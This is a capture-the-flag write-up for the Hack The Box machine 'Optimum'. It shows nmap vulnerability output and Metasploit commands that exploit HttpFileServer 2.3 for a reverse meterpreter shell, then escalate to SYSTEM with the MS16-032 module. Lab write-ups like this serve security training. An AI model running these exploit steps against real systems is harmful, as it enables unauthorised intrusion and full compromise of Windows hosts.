Optimum
Write up for the HTB machine 'Optimum'
1. Inital recon
1.1. nmap
nmap --script vuln 10.10.10.8
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.tenable.com/plugins/nessus/55976
| https://www.securityfocus.com/bid/49303
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_ https://seclists.org/fulldisclosure/2011/Aug/175
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
1.2. website recon
even though nmap reveals some vulnerabilities, we're looking for remote code execution vulnerabilities, so let's visit the web application in the browser
we can see that it is running HttpFileServer 2.3
2. msfconsole
let's start by running search HttpFileServer 2.3
in msfconsole
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
let's use this exploit by running use 0
we need to set the options for the exploit
set rhost 10.10.10.8
set lhost YOUR_IP
and then exploit
for our meterpreter shell
then we can find the user flag at C:\Users\kostas\Desktop
3. root.txt
let's try and find a vector to escalate our privileges. within our meterpreter shell run the command run post/multi/recon/local_exploit_suggester
and we can see exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
has potential
so let's use this exploit. put the current session in the background using ctrl+z
, then run use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set the options
set lhost YOUR_IP
set session SESSION_NUMBER
You can check the session number using sessions
finally, exploit
to run the exploit. once we have a meterpreter shell we can run shell
and then whoami
to confirm that we are nt authority\system
the root flag can be found at C:\Users\Administrator\Desktop
Last updated
Was this helpful?